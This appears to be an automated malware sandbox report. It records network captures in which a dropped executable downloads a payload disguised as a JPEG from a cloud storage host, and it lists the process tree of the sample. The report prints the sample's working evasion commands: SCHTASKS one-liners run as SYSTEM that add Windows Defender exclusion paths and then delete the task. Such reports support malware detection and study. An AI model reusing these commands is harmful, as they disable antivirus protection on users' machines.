2025-01-07 03:22:51 UTC	4096	IN	Data Raw: ef cc 4c d0 d3 09 06 21 8c 0a e4 fd 58 ee 29 db 81 82 6d c1 a4 30 bc c1 88 36 cd ab 62 b5 32 ab fb fb ec 20 e3 1f be d1 52 c7 7b bf 58 54 f3 43 f2 8d 0e 8b f7 13 10 a0 bb 4f ee a1 7a 27 8f 37 90 b6 93 e7 12 94 df b3 75 98 ed 5e 3f 26 b3 6b dc e4 4b ac 06 65 59 29 76 21 46 e6 59 50 ec 8d 23 41 76 61 bd b4 2a c0 a1 d0 00 7d 85 b9 46 a9 73 14 b0 38 5b 50 8e c5 4d 41 4e b1 33 ec 52 c8 9b 60 d6 75 f5 94 ee 23 f4 6f f6 e6 d2 e9 4d 56 be d7 e4 8f 26 6e aa 79 e5 e6 5e 13 6c 17 b6 e2 e2 11 f5 fe 7e 0b 44 9b c6 aa 3a f9 70 8c 7b bc 07 41 a6 db 37 9c 40 ed 30 d4 63 08 f2 34 c3 bc 19 00 1b 0e a0 05 0a d9 18 ea e0 fd 6c 8a 5d c5 2d 44 59 87 c8 6a f8 9f 94 42 5d b7 0d 78 f1 3b 58 f0 58 03 2c 94 05 87 6d 14 59 c3 c8 52 68 6d 20 54 3c df df dd d3 b3 5e da 3a d6 ef ef f3 Data Ascii: L!X)m06b2 R{XTCOz'7u^?&kKeY)v!FYP#Ava*}Fs8[PMAN3R`u#oMV&ny^l~D:p{A7@0c4l]-DYjB]x;XX,mYRhm T<^:
2025-01-07 03:22:51 UTC	4096	IN	Data Raw: 15 03 58 89 56 b4 b6 a2 ad 03 9c f1 67 d1 75 f3 e8 19 38 39 86 89 50 71 f6 9c 55 6e f0 3c 79 b6 4b a6 36 b9 b4 a2 ab 24 ae 39 77 96 dd 86 d0 fd 7d 97 cb 0d f0 c5 e3 02 f9 c1 52 24 d9 92 d5 0f ce ba 02 8d 60 9d a4 7e 46 0c f6 07 7e 6e 99 9f b7 49 61 ff 7c c2 1d c4 45 e2 10 ab 9d 5d f3 48 c7 32 f2 49 bd 7e 2c f3 14 b8 55 84 3b b6 cd f2 2c a2 4e c8 2f 6a 5f 90 af 64 33 93 34 22 de 67 0c 00 0a 07 58 6d 1d 91 a5 e8 77 57 3e 92 ad 64 db 25 db 5a a7 9e fb ee 37 1e bf 9f 1c 20 8f 58 83 8e 9c 9d 1a 84 f4 2f e8 b6 e9 fc 5c 14 cf 3d a8 20 c1 36 73 8b 6d ad fa 19 32 a5 19 e7 34 c8 51 2a b2 c7 6f 71 16 6b 1a c9 12 87 4a 5b 13 27 7e 0c 5d 42 3e 1f df 6d a6 94 82 5a 53 5e fd 07 49 a4 e3 fa f2 49 de ae 8b 50 62 d9 cf c2 ba 82 06 00 8f 34 6e 19 e8 d9 e4 90 5c e0 85 6f a3 Data Ascii: XVgu89PqUn<yK6$9w}R$`~F~nIa\|E]H2I~,U;,N/j_d34"gXmwW>d%Z7 X/\= 6sm24Q*oqkJ['~]B>mZS^IIPb4n\o

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	50015	118.178.60.9	443	7296	C:\Users\user\Documents\lOXFJk.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-07 03:23:01 UTC	115	OUT	GET /FOM-53.jpg HTTP/1.1 User-Agent: GetData Host: 22mm.oss-cn-hangzhou.aliyuncs.com Cache-Control: no-cache
2025-01-07 03:23:01 UTC	547	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Tue, 07 Jan 2025 03:23:01 GMT Content-Type: image/jpeg Content-Length: 366410 Connection: close x-oss-request-id: 677C9E15E001B43635069C7A Accept-Ranges: bytes ETag: "DA1D5EB665D3AAD523BE59415E6449ED" Last-Modified: Tue, 22 Oct 2024 14:47:51 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 5641369857548672686 x-oss-storage-class: Standard x-oss-ec: 0048-00000105 Content-Disposition: attachment x-oss-force-download: true Content-MD5: 2h1etmXTqtUjvllBXmRJ7Q== x-oss-server-time: 27
2025-01-07 03:23:01 UTC	3549	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 90 00 90 00 00 ff e1 00 5a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 05 03 01 00 05 00 00 00 01 00 00 00 4a 03 03 00 01 00 00 00 01 00 00 00 00 51 10 00 01 00 00 00 01 01 00 00 00 51 11 00 04 00 00 00 01 00 00 16 25 51 12 00 04 00 00 00 01 00 00 16 25 00 00 00 00 00 01 86 a0 00 00 b1 8f ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 Data Ascii: JFIFZExifMM*JQQ%Q%CC
2025-01-07 03:23:01 UTC	4096	IN	Data Raw: 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 60 Data Ascii: ```````````````````````````````````````````````````````````````
2025-01-07 03:23:01 UTC	4096	IN	Data Raw: 60 60 60 eb 25 68 30 9f 75 d0 14 62 70 e9 25 84 e3 1d 84 60 15 67 52 a0 89 a9 60 60 60 06 67 e5 4c a2 a0 c6 2b ed ac f1 5f b5 0c d4 a2 b0 c6 29 e5 4e 2b f5 44 2b e2 ac 2b a8 2b b1 29 f5 10 8a f0 6d a5 0c b0 6b ad 34 6b b1 a8 b2 1f f5 2c 94 e2 f0 63 18 1f 95 e7 d2 20 09 68 e0 e0 e0 67 e5 5c a1 a0 a0 a0 ca a4 2d e5 5c f0 ca a8 c8 5f 5f a0 a0 2b ed 74 2b f1 e8 f2 5f b5 08 d4 a2 70 e5 a0 15 59 a7 25 b8 61 60 60 60 a7 25 bc 40 df 62 60 a7 25 80 e8 73 60 60 0a 60 0a 60 ed 25 48 f0 ca a0 ca a0 ca ac 2d ed 78 f1 c8 a4 a0 a0 38 2b f5 74 2b e2 e8 f0 5f b5 00 d4 a2 b0 2b ed 34 26 a1 b3 e1 8a e0 8a e0 8a e0 6b b5 34 b2 88 69 f7 e0 f0 8a e0 8a e0 08 da 10 e0 e0 63 24 fc 2b ed 74 29 e1 e4 10 a1 2b 45 fd 62 a8 a0 f5 2b 4c 18 b8 6a a0 a0 48 9a a7 a1 a0 f6 f7 2b e5 a8 e9 Data Ascii: ```%h0ubp%`gR```gL+_)N+D+++)mk4k,c hg\-\__+t+_pY%a```%@b`%s````%H-x8+t+_+4&k4ic$+t)+Eb+LjH+
2025-01-07 03:23:01 UTC	4096	IN	Data Raw: 2c 9d 9f 9f 31 ed f5 f4 9e 9f 9f 32 88 1d 9d 60 60 e3 a4 70 ed e5 f4 9e 9f 9f 30 ed ed 10 5d 5f 5f f1 5f b5 30 d2 a2 b0 ca a0 c8 20 a0 a0 a0 ca a2 ca a0 ca a2 c8 a0 a0 a0 e0 c8 a0 4c a2 f0 1f f5 74 92 e2 f0 69 65 84 1d 1f 1f 63 5d 84 1d 1f 1f 1f 95 e7 d3 20 09 0a e0 e0 e0 8a e0 6d 35 cc 5d 5f 5f f2 2b e5 a8 f0 48 06 5c a0 a0 23 64 a4 2b ed ac 8b 68 23 49 a1 f1 2b f5 a8 f2 48 f1 9c 60 60 e3 a4 64 eb 2d 68 ed 34 61 61 32 eb e5 04 9d 9f 9f 30 9f 75 f8 12 62 70 eb ed 04 9d 5f 5f f1 5f b5 44 d2 a2 b0 c8 54 a1 a0 a0 5f b5 6c d2 a2 b0 ca a1 c8 8c 4c a2 b0 48 61 5c 5f 5f 63 24 e8 8a e0 88 b8 0c e2 f0 08 dd 1b e0 e0 63 24 e8 63 18 1f 94 d0 8a e0 8a e0 8a e0 6d 75 18 5e 5f 5f f2 c8 24 4c a2 b0 ca a0 5f b5 a0 d3 a2 b0 ca a0 01 68 ec a5 b0 f0 5f b5 3c d2 a2 b0 ca 60 Data Ascii: ,12``p0]___0 Ltiec] m5]__+H\#d+h#I+H``d-h4aa20ubp___DT_lLHa\__c$c$cmu^__$L_h_<`
2025-01-07 03:23:01 UTC	4096	IN	Data Raw: 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 44 45 46 47 48 49 4e 4e 4e 4a 4b 4e 8e 8e 8c 8d f5 2b 4c 21 4c 18 a2 a0 a0 29 2d e8 5d 5f 5f c8 ac 4e a2 b0 48 3e a3 a0 a0 23 64 a4 8a e0 88 f4 0e e2 f0 08 d5 0d 1f 1f 63 24 e8 8a e0 88 d0 0e e2 f0 08 c6 0d 1f 1f 63 24 e8 88 08 a3 a0 a0 5f b5 6c d2 a2 b0 c8 e8 4e a2 b0 5f b5 20 d2 a2 b0 c8 c0 4e a2 b0 5f b5 20 d2 a2 b0 c8 88 63 60 60 9f 75 ac 12 62 70 08 64 61 60 60 ed e5 98 9e 9f 9f 30 0a 60 9f 75 e4 12 62 70 a6 e5 24 5e 5f 5f eb 66 25 25 5e 5f 5f e5 66 25 26 5e 5f 5f f2 66 25 27 5e 5f 5f ee 66 25 28 5e 5f 5f a5 26 65 69 1e 1f 1f ac 26 65 6a 1e 1f 1f d3 26 65 6b 1e 1f 1f d2 26 65 6c 1e 1f 1f ce 26 65 6d 5e 5f 5f c4 66 25 2e 5e 5f 5f cc 66 25 2f 5e 5f 5f cc 66 25 30 5e 5f 5f a0 66 25 d4 5e 5f 5f e7 a6 Data Ascii: NNNNNNNNNNNNNNNNNNDEFGHINNNJKN+L!L)-]__NH>#dc$c$_lN_ N_ c``ubpda``0`ubp$^__f%%^__f%&^__f%'^__f%(^__&ei&ej&ek&el&em^__f%.^__f%/^__f%0^__f%^__
2025-01-07 03:23:01 UTC	4096	IN	Data Raw: 75 90 12 62 70 d8 61 60 60 60 8b 62 8b 80 eb 85 3d a3 35 eb 8c e3 8c 08 37 eb 25 68 e9 25 38 66 e5 3c a0 19 b8 a0 a0 a0 93 60 2d dd 3d 53 0b c6 0b 0a ca c4 2b ed 38 f1 2d f5 3c f2 48 92 2f e0 e0 63 24 ec 6d a5 7c b0 6b ed 28 09 e2 f0 b1 88 78 a5 e5 f0 6b b5 78 63 22 84 b2 08 df 1f 5f 5f 23 64 b0 93 60 ff 2b 45 fd 62 a4 a0 f5 2b 4c ca a0 01 68 49 a2 b0 f0 c8 38 e5 a5 b0 2b ed 68 31 88 7a 9f 9f 9f e3 a4 70 53 a0 3d a2 64 60 35 eb 8c 0a 60 c1 60 60 60 70 30 08 60 60 60 70 2b ed a8 f1 48 58 5e 5f 5f 23 64 b0 93 60 fd 62 a4 a0 f5 2b 4c 21 4c 80 a4 a0 a0 f7 c8 cc 4f a2 f0 1f f5 68 92 e2 f0 69 a5 18 d3 20 86 41 6a dd e5 f0 65 20 95 e5 09 a7 e1 e0 e0 d3 29 86 6b ed 2a 9d a5 b0 29 ed 5c 2b f5 5c 61 42 aa 29 f5 50 ca a0 c8 20 a0 a0 a0 ca a4 ca a0 ca a2 c8 a0 a0 60 Data Ascii: ubpa```b=57%h%8f<`-=S+8-<H/c$m\|k(xkxc"__#d`+Eb+LhI8+h1zpS=d`5````p0```p+HX^__#d`b+L!LOhi Aje )k*)\+\aB)P `
2025-01-07 03:23:01 UTC	4096	IN	Data Raw: 61 60 60 eb 25 68 30 ed ed 40 9d 9f 9f 31 88 00 df 60 60 e3 a4 6c a6 e5 f8 9e 9f 9f 60 d9 f9 a0 a0 a0 93 60 2d 1d 39 5e 5f 5f 53 0b c6 0b 0a ca a0 ca a0 ca a2 ca a0 ca a1 c8 a0 a0 a0 e0 6d 75 cc 1e 1f 1f b2 1f f5 74 92 e2 f0 69 65 70 1e 1f 1f 63 5d 70 1e 1f 1f 1f 95 e7 d3 20 09 11 a0 a0 a0 ca a0 2d 25 34 5e 5f 5f f0 2b ed ac 21 49 d0 a1 a0 a0 f1 2b f5 a8 21 62 d0 a1 a0 a0 f2 eb e5 f0 9e 9f 9f 30 9f 75 f8 12 62 70 e5 a0 15 67 53 a0 89 dc 60 60 60 eb ed f0 9e 9f 9f 31 9f b5 a4 ed a5 b0 2d 35 88 5d 5f 5f f2 48 c4 6c a0 a0 23 64 a4 25 60 d4 85 2d 25 88 5d 5f 5f f0 2d 6d cc 1e 1f 1f b1 88 6c 11 e2 f0 6d 75 78 1e 1f 1f b2 1f f5 b4 ad e5 f0 63 24 f0 0b f4 6d 65 cc 5e 5f 5f f0 2d 2d 38 5e 5f 5f f1 5f b5 68 d2 a2 b0 2b 35 84 5d 5f 5f 29 35 bc 5d 5f 5f 23 1d bc 9d Data Ascii: a``%h0@1``l``-9^__Smutiepc]p -%4^__+!I+!b0ubpgS```1-5]__Hl#d%`-%]__-mlmuxc$me^__--8^___h+5]__)5]__#
2025-01-07 03:23:01 UTC	4096	IN	Data Raw: 60 ac ac 35 eb 8c 53 a0 c0 4c c6 65 70 e3 80 61 e5 a0 15 6f ea 6d 4c c6 65 70 e0 a9 61 e8 ad 8c 06 a5 b0 fd 63 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c f5 2b 4c f1 29 ed 5c 2b e5 ac 2a e8 6b b5 1c 68 ea 8a e0 6b ad 1c 08 f5 e2 e0 e0 6b a5 e8 b0 6b ad 1c 08 a9 e1 e0 e0 6b a5 1c 6b 45 fd 62 a8 a0 f5 2b 4c f1 29 ed 5c ca a1 2b ed 5c 48 4f a1 a0 a0 2b 45 fd 63 6c 6c 6c 6c 6c 6c ac ac ac ac ac 35 eb 8c 31 e9 2d 9c ea 25 68 30 0a 61 eb 2d 9c 88 eb 60 60 60 eb 85 3d a2 64 60 6c 6c 6c 6c 6c f5 2b 4c f1 29 ed 5c 2b e5 5c 2b e8 a8 9b ed a8 d7 a5 48 c2 c9 a1 a0 2b ed 5c 48 f1 e1 e0 e0 6b b5 1c 6b a2 e4 e3 a5 e8 6b 05 bd 22 e4 e0 2c 2c b5 6b 0c 63 0c e8 69 ad 1c 6b a5 5c 23 d8 a4 a0 d5 aa 48 c9 a1 a0 a0 29 e5 58 4b a9 2b ed 5c 2b f1 a4 29 f5 58 2b e5 58 2b 45 fd a3 Data Ascii: `5SLepaomLepacllllllllllllll+L)\+*khkkkkkEb+L)\+\HO+Ecllllll51-%h0a-```=d`lllll+L)\+\+H+\Hkkk",,kcik\#H)XK+\+)X+X+E
2025-01-07 03:23:01 UTC	4096	IN	Data Raw: 62 e3 98 1d 15 6a a7 65 0c 94 62 70 60 60 60 60 e3 5d 0c 94 62 70 60 14 41 08 12 74 60 60 5f b5 6c d2 a2 b0 2b 2d 44 5e 5f 5f 48 7c 5c 5f 5f 2b 2d 44 5e 5f 5f 48 ff 5d 5f 5f 2b ed 54 c4 69 ed e0 e0 e0 e0 bf be bb 6b 05 bd 22 e8 e0 2c 2c 2c 2c 2c 2c b5 6b 0c b1 69 ad 1c 6b ad 1c 08 23 5c 5f 5f 2b e5 a8 23 40 a1 25 60 d4 ac 2b ed 5c f1 48 53 3e a0 a0 23 64 a4 2b e5 5c 2b 45 fd a2 64 60 ac ac 35 eb 8c 88 67 60 60 60 88 71 60 60 60 3d a3 35 eb 8c d9 ad 2c 65 70 88 75 3c 61 a0 fd 63 f5 2b 4c c8 f0 d7 a0 b0 48 10 0d a0 a0 23 64 a4 fd 63 f5 2b 4c 19 6d ec a5 b0 48 d3 fd e1 e0 bd 23 b5 6b 0c 08 e7 e0 e0 e0 08 f1 e0 e0 e0 bd 23 b5 6b 0c 59 2c ac e5 f0 08 30 89 e1 e0 fd 63 f5 2b 4c c8 2f d7 a0 b0 48 d1 0d a0 a0 23 64 a4 fd 63 f5 2b 4c 19 6c ec a5 b0 48 90 cb a1 60 Data Ascii: bjebp````]bp`At``_l+-D^__H\|\__+-D^__H]__+Tik",,,,,,kik#\__+#@%`+\HS>#d+\+Ed`5g```q```=5,epu<ac+LH#dc+LmH#k#kY,0c+L/H#dc+LlH`
2025-01-07 03:23:01 UTC	4096	IN	Data Raw: eb 25 d0 30 9f 75 4c 10 62 70 eb 2d f8 e9 2d e4 eb 35 d0 32 9f 75 84 12 62 70 eb 25 cc 30 5f b5 44 d2 a2 b0 2b ed 24 29 ed 18 4b a7 67 e5 18 a0 a0 a0 a0 23 dd 14 a0 d4 aa 2b f5 14 f2 5f f5 ec 92 e2 f0 6b a5 58 6b 05 bd 23 b5 6b 0c 61 0c 7c e5 e0 e0 88 df 68 e0 f0 88 50 3d e4 f0 1f b5 80 d0 a2 b0 03 54 ed a5 b0 67 a5 58 ed a5 b0 80 a0 a0 a0 67 a5 a0 ee a5 b0 a7 a0 a0 a0 67 a5 64 2e 65 70 60 60 60 60 a7 65 70 2e 65 70 b0 67 60 60 a7 65 6c 2e 65 70 61 60 60 60 a7 65 9c 2d a5 b0 a2 a0 a0 a0 c8 58 ed a5 b0 01 54 ed a5 b0 f0 5f b5 c4 d0 a2 b0 67 a5 ac ee a5 b0 a0 a0 a0 e0 88 14 e1 e0 e0 1f f5 2c 92 e2 f0 27 65 8c 1f 1f 1f 74 e0 e0 e0 6d 6d 8c 1f 1f 1f b1 1f f5 f8 d2 a2 b0 23 1d d0 5f 5f 5f a6 d3 96 67 a5 5c ed a5 b0 a4 a0 a0 a0 c8 58 ed a5 b0 2b b5 54 ed a5 70 Data Ascii: %0uLbp--52ubp%0_D+$)Kg#+_kXk#ka\|hP=TgXggd.ep````ep.epg``el.epa```e-XT_g,'etmm#___g\X+Tp

Target ID:	0
Start time:	22:21:16
Start date:	06/01/2025
Path:	C:\Users\user\Desktop\287438657364-7643738421.08.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\287438657364-7643738421.08.exe"
Imagebase:	0x140000000
File size:	30'886'912 bytes
MD5 hash:	12771744B7DE8FFB1F0DDDF3AC8ED2F4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	22:22:15
Start date:	06/01/2025
Path:	C:\Users\user\Documents\lOXFJk.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Documents\lOXFJk.exe
Imagebase:	0x140000000
File size:	133'136 bytes
MD5 hash:	D3709B25AFD8AC9B63CBD4E1E1D962B9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	22:22:17
Start date:	06/01/2025
Path:	C:\Users\user\Documents\lOXFJk.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Documents\lOXFJk.exe
Imagebase:	0x140000000
File size:	133'136 bytes
MD5 hash:	D3709B25AFD8AC9B63CBD4E1E1D962B9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	22:22:28
Start date:	06/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Imagebase:	0x7ff6bd4c0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	22:22:28
Start date:	06/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	22:22:28
Start date:	06/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	22:22:28
Start date:	06/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Run /TN "Task1"
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	22:22:28
Start date:	06/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
Imagebase:	0x7ff6bd4c0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	22:22:28
Start date:	06/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Delete /TN "Task1" /F
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	22:22:28
Start date:	06/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	22:22:28
Start date:	06/01/2025
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
Imagebase:	0x7ff683750000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	22:22:29
Start date:	06/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Imagebase:	0x7ff6bd4c0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	22:22:29
Start date:	06/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	22:22:29
Start date:	06/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	22:22:29
Start date:	06/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Run /TN "Task1"
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	22:22:29
Start date:	06/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
Imagebase:	0x7ff6bd4c0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	22:22:29
Start date:	06/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Delete /TN "Task1" /F
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	22:22:29
Start date:	06/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f330000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	22:22:29
Start date:	06/01/2025
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
Imagebase:	0x7ff683750000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	22:22:30
Start date:	06/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Imagebase:	0x7ff6bd4c0000
